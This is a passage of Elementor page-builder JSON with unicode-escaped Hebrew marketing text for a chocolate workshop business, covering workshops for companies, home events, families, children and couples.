\\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd<\\/h2><p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7. <br \\/><span style=\\\"color: #ff0000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05d4\\u05d9\\u05d0 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05d8\\u05d5\\u05d1\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d6\\u05d0\\u05ea.<\\/span><\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd. <br \\/><br \\/>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd. <br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5. <br \\/><br \\/>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h3><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea. <br \\/><br \\/>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc 